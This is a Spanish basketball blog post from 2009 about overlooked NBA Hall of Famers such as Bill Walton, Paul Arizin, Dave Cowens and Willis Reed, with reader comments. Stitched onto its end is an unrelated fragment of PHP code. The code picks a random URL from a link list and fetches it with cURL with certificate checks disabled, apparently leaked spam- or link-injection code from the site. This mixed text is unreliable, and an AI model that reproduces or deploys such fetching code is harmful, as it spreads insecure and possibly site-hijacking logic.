Grandes “olvidados” históricos

28 de August de 2009 por TheDeerHunter
Artículo 6 de 7 de la serie Los mejores de la historia

Vamos concluyendo nuestro repaso de los mejores jugadores de la historia NBA. Habiendo elegido un enfoque con los 10 mejores por posición y a partir de un punto de vista colectivo no hemos podido evitar apartar de nuestras listas a algunos de los más grandes. Todos son “Hall of Famers” que en su día fueron elegidos entre los 50 mejores de los 50 primeros años de la liga. Para completar esta serie legendaria conviene recordar a los más importantes.

Bill Walton: Estaba llamado a ser el gran pívot blanco del baloncesto moderno. Algunos le ponían al nivel de los Chamberlain, Russell o Jabbar pero su cuerpo jamás le permitió resistir la comparación. Con todo fue capaz de alcanzar la grandeza en el poco tiempo que dispuso para mostrarnos su juego.

Medio sano en el mejor de los casos, fue capaz de ganar un anillo con los Blazers y un MVP llegando a jugar sólo 65 partidos en su campaña más completa. Buen anotador, excelente pasador y superlativo defensor en aquellas 4 “medias” campañas en Portland nadie le hubiera discutido su categoría. En los 5 años siguientes apenas lograría jugar algo más de 40 partidos en total con una rodilla izquierda completamente deshecha. Como ex jugador en activo fue capaz de reinventarse a si mismo siendo fundamental como 6º hombre en el anillo de los Celtics en el mítico equipo del 86.

Paul Arizin: Fue el primer gran bombardero allá por los años 50, en una época en la que a nadie se le hubiera pasado por la cabeza que un exterior pudiera dominar el juego. “Impossible is nothing” debía de ser el lema de este genio y así lo demostró haciendo suya la técnica visionaria de la suspensión. Su impacto fue algo así como el de Fosbury para el salto de altura, poniendo este deporte patas arriba, abusando de sus contrincantes sin el físico que en aquella época se exigía para ello. En un estilo mucho menos dinámico que el actual y sin línea de tres, el tipo se las apañaba para anotar casi 23 puntos por partido, tanto o más que nombres como Julius Erving, Alex English o Paul Pierce por poner algunos ejemplos del baloncesto moderno. Pero es que además era un reboteador bestial sólo por debajo de Bird y Baylor en la lista de los mejores aleros. Como colofón fue capaz de ganar un título para los Warriors. Sin lugar a dudas se trata de un currículum digno de seguir siendo reconocido, al menos durante un tiempo, como uno de los 50 mejores de la historia.

Dave Cowens: Uno de los más infravalorados de todos los tiempos. Su imagen poco “glamourosa” de pívot blanco y currante despierta poco interés. Sólo los más fervientes seguidores Celtics recordarán su legado. La tarea a la que estaba llamado era directamente inalcanzable: hacer olvidar a Bill Russell y reconstruir sobre sus hombros el que había sido un equipo irrepetible. A pesar de todo no le fue del todo mal. 2 títulos de los 17 le debe la franquicia del trébol con seguramente los peores mimbres que haya tenido la misma para lograrlos. Es el mayor desconocido de toda la lista de los MVPs y se lo ganó al mejor Jabbar, ahí es nada. Sus virtudes, por supuesto, trabajo duro, casi 14 rebotes por partido y una capacidad defensiva asombrosa para un “blanquito”, pero también buena mano y un conocimiento del juego que le hacen ser uno de los mejores pívots pasadores de siempre. También tiene margen para seguir perteneciendo a la lista de los mejores 50 durante algunos años más.

Willis Reed: El “Cid Campeador” de la NBA. Ganó títulos hasta sin jugarlos. Ya hemos hablado del legendario 7º partido en la final de 1970, contra el mismísimo Chamberlain, cuando salió unos minutos lesionado inspirando a sus compañeros para ganar aquel partido imposible. En la época de Chamberlain vs Russell él era casi tan animal como ellos y tan solo las lesiones pudieron pararlo. Su corta carrera es la mayor razón por la que se recuerda más a Ewing que a él mismo, a pesar de los 2 anillos que ganó para la franquicia de la Gran Manzana. Ewing fue mejor anotador pero inferior en todo lo demás. Así os podéis hacer una idea de lo increíblemente duro que era Willis Reed cuando estuvo sano. Definitivamente,  fue el  mejor de los mejores Knicks de todos los tiempos.

DolphSchayes.jpg image by mabeufDolph Schayes: La rutilante estrella de los Nationals de Syracuse, actuales Sixers. Principal culpable del primer anillo para ellos y tras más de 60 años, líder de algunos apartados estadísticos de la histórica franquicia. Su carrera es impecable: 15 años en la liga es una salvajada para una época en la que ser jugador de baloncesto no significaba convertirte automáticamente en famosísimo multimillonario. En 12 de ellos fue all-star y elegido en uno de los equipos ideales de la liga. Sin lugar a dudas el mejor ala-pívot del momento con diferencia. Con sus 2 metros raspados se abonó al 20-10 sin despeinarse llegando a marcarse alguna temporada de 25-14 que, de haber existido el premio, a bien seguro que le hubieran supuesto algún que otro MVP. Siendo un reboteador superlativo, ofensivamente supo adaptarse mejor que nadie a los vertiginosos cambios que tuvieron lugar en aquella época. Representa el puente del baloncesto arcaico al moderno.

Wes Unseld: Ya hablamos en su día de Unseld en este blog a raíz de la célebre trivial del 2k9 sobre los MVP y ROY del año la misma temporada. Era una mala bestia que formó con Elvin Hayes una de las parejas de interiores más brutales de todos los tiempos. Un center de 2 metros que se pegaba sin problemas contra tipos 15 cm más altos que él. Reboteador por antonomasia, era una auténtica roca dotado de una desconcertante inteligencia y conocimiento del juego. Así emuló con acierto el papel de Russell en un equipo diseñado a partir del espíritu colectivo del modelo Celtic pero con mimbres más humildes. Con este rol lideró como MVP a los Bullets (hoy los Wizards) hasta el anillo y a tres subcampeonatos más, algo increíble en una franquicia tan modesta entonces como lo es ahora.

Para no aburrir, podríamos dejarlo aquí. Diríamos que entre estos jugadores más los 50 de los que ya hemos hablado y alguna entrada inminente que todos tenemos en la cabeza (¿The Chosen?), deberían estar con seguridad los 50 mejores jugadores de la historia a día de hoy.

Por unas razones o por otras, consideramos que podrían ser candidatos a caerse de la lista original del 50º aniversario leyendas como Jerry Lucas, Billy Cunningham, Nate Thurmond, Dave Debusschere, Dave Bing, Nate Archibald, Hall Greer y Bill Sharman, de los cuales, si lo consideráis oportuno, estáis invitados a aportar alguna reseña, así como de cualquier otro jugador que estiméis merezca estar en una hipotética lista de los 50.

Con esto termina nuestra serie histórica. Esperamos que os haya gustado.

Comenta

8 comentarios a esta entrada

  1. Angel dice:
    #1

    Tremendo post.

    A alguno de ellos los conocía, pero por ejemplo, no había oido hablar de Dolph Schayes en mi vida… Habrá que informarse mejor.

    Un saludo!!

      Citar

  2. Óscar dice:
    #2

    Excelente artículo, deerhunter. Y poner al gran Bill Walton de #1, un detalle para un “blazermaníaco” como yo. Artífice del único campeonato de Portland en 1977, tras solo 7 años de Historia como franquicia, como decíamos en otra entrada. Curiosamente, su máximo afán tras lograr el anillo era que le devolviesen la bicicleta en la que solía ir a entrenar (como ahora Nash o Amundson), que le habían robado durante las finales, según he visto en algún reportaje. Un “hippie” convencido y comprometido, un jugador gigantesco a pesar de las lesiones.

      Citar

  3. Kiki dice:
    #3

    Siempre se habla de Walton como el gran protagonista del título de Portland en 1977, pero no olvidemos que era un gran equipo, con jugadores como Lionel Hollins, Maurice Lucas, Bob Gross, Larry Steele, Dave Twardzik y el propio “Big Bill”, todos ellos con su camiseta retirada, si no me equivoco. El “look” de Walton y esa camiseta de los blazers son de traca.

      Citar

  4. TheDeerHunter dice:
    #4

    Gracias a todos,
    Oscar, para serte sincero tengo que matizar que el hecho de que Walton esté el primero no es porque lo considere el mejor de ellos. Potencial tenía para haber sido un top 10 histórico no lo dudo, pero la realidad es que todos los demás disfrutaron de una carrera muchísimo más completa que la suya.
    De todas formas los contados partidos clásicos que le he visto jugar está claro que era la bomba el tipo.

    Kiki, creo que a estas alturas de la película, el decir que tal título fue gracias a tener un super-equipo detrás hay que darlo por hecho. Casi todos los equipos campeones han sido una pasada en lo colectivo (no se me ocurre ahora mismo ninguno que no lo haya sido) pero estarás de acuerdo también en que prácticamente todos los anillos que se han repartido tienen un nombre propio (o más de uno en algún caso) En este caso aquel de los Blazers es el de Walton… y sin específicamente él no se entiende ese anillo.

      Citar

  5. Óscar dice:
    #5

    Sí, es cierto que no era un “top” como tal, sino que es del primero que hablas. En el caso de Walton es más su leyenda, su aspecto y las lesiones lo que le lleva a la celebridad más que sus números, aunque no está mal ser campeón con dos equipos distintos.
    En cuanto al equipo de Portland ’77 claro que era mucho más que Walton. Estaban también otros jugadores como Lloyd Neal o el base Johnny Davis, que se ha reencontrado con Lionel Hollins en el actual staff técnico de Memphis, e incluso les llegó a dirigir de forma interina tres partidos esta última campaña, hasta que llegó Hollins. Un cuadro en el que por cierto también están el padre de Mike, Henry Bibby o Damon Stoudamire, que ya empezó de prácticas esta primavera, colocándose detrás del banquillo con sus apuntes… Se hace raro verlo.
    Todo equipo campeón de la NBA necesita mucho más que una garan estrella o varios buenos jugadores. La excepción a esa regla podrían haber sido los Sixers de Iverson, pero no se dio el caso en aquel 2001.

      Citar

  6. MagicJohnson32 dice:
    #6

    Enhorabuena Deer, hacía falta un artículo como este para “cerrar el círculo”, para corregir las inevitables injusticias que se cometen al hacer listas.

    En resumen, que te ha quedado niquelao 😀

      Citar

  7. Dantley2 dice:
    #7

    Articulazo, sí señor.

    De los que nombras abajo, mi preferido es Archibald. Tuvo un año estratósferico, de top-10, pero luego una lesión le dejó tocadísimo para un jugador basado en la velocidad.

    De los que nombras sin duda Walton, que comentas bien que supo readaptarse para sguir siendo útil.

    Y Arizin un descubrimiento total.

      Citar

  8. TheDeerHunter dice:
    #8

    No he podido resistirme a enlazar este artículo del maestro Paniagua hablando sobre David Thompson:
    http://www.solobasket.com/blogs/comentarios/skywalker/c-612.html#zonacomentarios
    Creo que nadie podría haber hecho una reseña mejor de este grande “olvidado”.

    El tipo en cuestión era una máquina que en condiciones normales seguramente hubiera sido un top 20… 73 puntacos en un partido. Pedazo de ametralladora.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>